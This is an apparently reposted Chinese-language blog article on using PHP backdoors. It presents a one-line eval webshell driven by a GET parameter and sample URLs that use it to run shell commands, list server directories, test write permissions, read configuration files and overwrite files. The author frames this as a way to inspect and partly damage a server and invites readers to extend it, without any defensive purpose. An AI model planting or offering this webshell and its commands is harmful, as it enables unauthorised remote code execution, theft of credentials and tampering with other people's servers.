首頁  >  文章  >  後端開發  >  PHP後門的一些用法

PHP後門的一些用法

藏色散人
藏色散人轉載
2019-06-05 15:17:377031瀏覽

今天我們說一些最常見的PHP留後門的一些用法

#首先,寫一個最簡單的後門,也可以叫木馬。

<?php eval($_GET[&#39;evl&#39;]);

就這樣,你已經獲得了這台伺服器上的許多執行權限。

那場景的用法有哪些呢?

列印伺服器phpinfo

http://www.test.com/a.php?evl=phpinfo()

查看某個目錄下有什麼檔案

http://www.test.com/a.php?evl=var_dump(system("ls /mnt/web/ -a"));

查看目錄是否可寫,接下裡就可以在可寫的目錄裡建立可執行檔了

http://www.test.com/a.php?evl=var_dump(is_writable("/mnt/web/abc/"));

取得某個檔案的內容,一般用來讀取設定

http://www.test.com/a.php?evl=var_dump(file_get_contents("/mnt/web/temp/api.php"));

對某個可寫目錄進行寫檔

http://www.test.com/a.php?evl=var_dump(file_put_contents("/mnt/web/temp/api.php",file_get_contents("/mnt/web/script/test.php")));

好了,以上基本上已經可以完成對一個伺服器的查看的部分破壞了,其他的功能就試著舉一反三吧。

以上是PHP後門的一些用法的詳細內容。更多資訊請關注PHP中文網其他相關文章!

陳述:
本文轉載於:aliyun.com。如有侵權,請聯絡admin@php.cn刪除